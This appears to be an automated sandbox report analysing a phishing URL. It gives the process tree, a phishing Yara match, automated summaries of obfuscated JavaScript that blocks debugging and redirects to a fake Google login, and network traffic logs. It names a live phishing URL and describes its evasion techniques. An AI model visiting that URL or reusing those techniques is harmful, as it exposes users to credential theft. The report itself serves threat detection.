Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bryf.atchirlisc.ru/EeMAGvIe/

Overview

General Information

Sample URL:https://bryf.atchirlisc.ru/EeMAGvIe/
Analysis ID:1586748
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected suspicious Javascript
AI detected suspicious URL
Maps a DLL or memory area into another process

Classification

  • System is w10x64
  • chrome.exe (PID: 1396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2032,i,5592853975208518090,15640883060359809183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bryf.atchirlisc.ru/EeMAGvIe/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • msedge.exe (PID: 1196 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?url=http%3A%2F%2Fwww.bing.com%2Fchat%3Fform%3DWSBSH1%26cvid%3Db374da154d8a4e3bb912f43f50eaafd2%26nclid%3D4C9C2B2D0465FD7A42C74C7E93CFB630%26ts%3D1736433000464%26nclidts%3D1736433000%26tsms%3D464&timestamp=1736433000464&source=WindowsSearchBox&medium=CodexUpsell MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7040 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2604 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7364 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6276 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7396 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6592 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 7900 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 7936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
  • msedge.exe (PID: 8036 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,12039556330216411981,17761890535772019975,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 3104 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2424 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2068,i,391148098692564676,17790295371905818145,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_270JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_270, type: DROPPED
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://bryf.atchirlisc.ru/EeMAGvIe/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (Google login page) after a delay. These behaviors are highly indicative of malicious intent, such as attempting to bypass security measures and potentially steal user credentials.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://bryf.atchirlisc.ru/EeMAGvIe/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://bryf.atchirlisc.ru
    Source: https://bryf.atchirlisc.ru/EeMAGvIe/HTTP Parser: No favicon
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /EeMAGvIe/ HTTP/1.1Host: bryf.atchirlisc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bryf.atchirlisc.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bryf.atchirlisc.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bryf.atchirlisc.ru/EeMAGvIe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBhWmpGMDVWZ01jS0xzWm9RVGJ1VkE9PSIsInZhbHVlIjoia1BUemJwcVdBTWdYaURwRGxueFlaZ3FlM3QvalNpcnk2REFqbmVvbTFsbEZnNzl5Y0plbW9CQTNVZGZLQmw0aXZoUEQvVEt2ejZrWVMxUlpRWUVwWks2dzRwR2QvSDNLYU94MHJqdXlDYld6VWdsYW5Pa0NWOE1vQUx2WmxmZWgiLCJtYWMiOiIyZGY1YWNlMTg4Mzk3ODliNTUxMDZiNTA4ODM3YmMxNDcwM2ZhZGIwYzVmZTQ3ODE4ODU2OTYyZTQ4YjRlMmIyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImwvSU9DVUgvSmM0bDNKT1FTWXJ4Q1E9PSIsInZhbHVlIjoiT0UvWkFpOEpGMDcrM0pmay9sUEhjOXd4b0F4OUNBbmhrUEFJRi96K3JEU3haVGNZQWJPUDhseXRHYzVEUnFmSnVLTXl6WENENlhiNzNwTjBIVWVmbVpkaXpWdm9DMENPSlBFaGZqcjdscjB0em5SNUxkMGVLbWlFQmR1V3lTVTgiLCJtYWMiOiIyNDk2ZjJiZTE2MmE5ZjhhMDQ5ZTM3MWMyZWRmZWZjYTBlOGNiYTdhMzgyNmQ1ZmRmNTBmMjBmYmNkNjI4YzNjIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: bryf.atchirlisc.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
    Source: unknownHTTP traffic detected: POST /report/v4?s=RCVyA2PmCfeA6ON61TEjBpw%2Fm12h53FjdAjxb4FjBGXqwn1FWtJRvY1aQKGCLi3Cy6IY8gvA3is%2Fk8cLz1KQGXWbMe0zkt6QAiJf%2Ftxe%2FQyWZveMmFngujKg7zpljg%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 433Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 14:29:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 6653Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCVyA2PmCfeA6ON61TEjBpw%2Fm12h53FjdAjxb4FjBGXqwn1FWtJRvY1aQKGCLi3Cy6IY8gvA3is%2Fk8cLz1KQGXWbMe0zkt6QAiJf%2Ftxe%2FQyWZveMmFngujKg7zpljg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=73699&min_rtt=73492&rtt_var=41&sent=545&recv=206&lost=0&retrans=0&sent_bytes=715236&recv_bytes=15884&delivery_rate=3850888&cwnd=4&unsent_bytes=0&cid=22be797f844a5494&ts=355703&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8ff51f08da638c0f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4204&recv_bytes=1902&delivery_rate=212348&cwnd=223&unsent_bytes=0&cid=a292274667ecbea8&ts=2793&x=0"
    Source: Reporting and NEL.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://bard.google.com/
    Source: Reporting and NEL.11.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
    Source: service_worker_bin_prod.js.11.dr, offscreendocument_main.js.11.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
    Source: Web Data.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: Web Data.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: Network Persistent State0.11.drString found in binary or memory: https://chrome.cloudflare-dns.com
    Source: manifest.json.11.drString found in binary or memory: https://chrome.google.com/webstore/
    Source: manifest.json.11.drString found in binary or memory: https://chromewebstore.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: manifest.json0.11.drString found in binary or memory: https://docs.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-autopush.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-0.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-1.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-2.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-3.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-4.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-5.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-6.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-preprod.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive-staging.corp.google.com/
    Source: manifest.json0.11.drString found in binary or memory: https://drive.google.com/
    Source: Web Data.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: Web Data.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: Web Data.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: 000003.log7.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
    Source: 000003.log8.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
    Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.dr, HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
    Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
    Source: 000003.log7.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
